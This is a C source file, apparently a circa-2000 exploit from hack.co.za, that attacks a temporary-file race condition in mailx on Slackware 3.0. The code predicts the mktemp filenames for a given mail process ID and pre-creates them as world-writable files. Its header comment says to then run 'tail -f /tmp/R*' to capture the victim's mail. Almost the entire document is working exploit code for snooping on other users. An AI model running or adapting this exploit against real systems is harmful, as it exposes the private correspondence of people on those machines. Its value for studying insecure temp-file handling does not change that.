/* This  program  creates  temporary  files  used  by mailx (/bin/mail
   under   Slackware  3.0),  which  can  then  be read by the program.
   This will exploit 4 of  the 5 temporary files, the  final temporary
   file is a tighter race condition, and is not handled by this  code.
   Following execution  of this  program with  the process  id of mail
   that is running, execute 'tail  -f /tmp/R*', redirecting to a  file
   if desired, and allow it to run until the mail process has  exited.
   This can be easily handled in  a shell script, but is not  included
   since it  is not  needed to  sufficiently demonstrate  the security
   flaw.
 
   Dave M. (davem@cmu.edu)
 */

#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>

void exploit_mktemp(char *dest, char *prepend, char *pid)
{
  int i;

  strcpy(dest,prepend);
  for(i=strlen(pid);i<6;i++)
    strcat(dest,"0");
  strcat(dest,pid);
  dest[strlen(prepend)] = 'a';
}


main(int argc, char **argv)
{
  char tmpf[5][80];    /* hold filename */

  umask(0);

  if(argc<2)
    {
      printf("mailbug racer\nSyntax: %s process-id\n",argv[0]);
      return -1;
    }

  /* get mktemp filenames */
  exploit_mktemp(tmpf[0],"/tmp/Re",argv[1]);
  exploit_mktemp(tmpf[1],"/tmp/Rs",argv[1]);
  exploit_mktemp(tmpf[2],"/tmp/Rq",argv[1]);
  exploit_mktemp(tmpf[3],"/tmp/Rm",argv[1]);


  /* create temporary files */
  creat(tmpf[0],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
  creat(tmpf[1],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
  creat(tmpf[2],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
  creat(tmpf[3],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);

}
/*                    www.hack.co.za              [2000]*/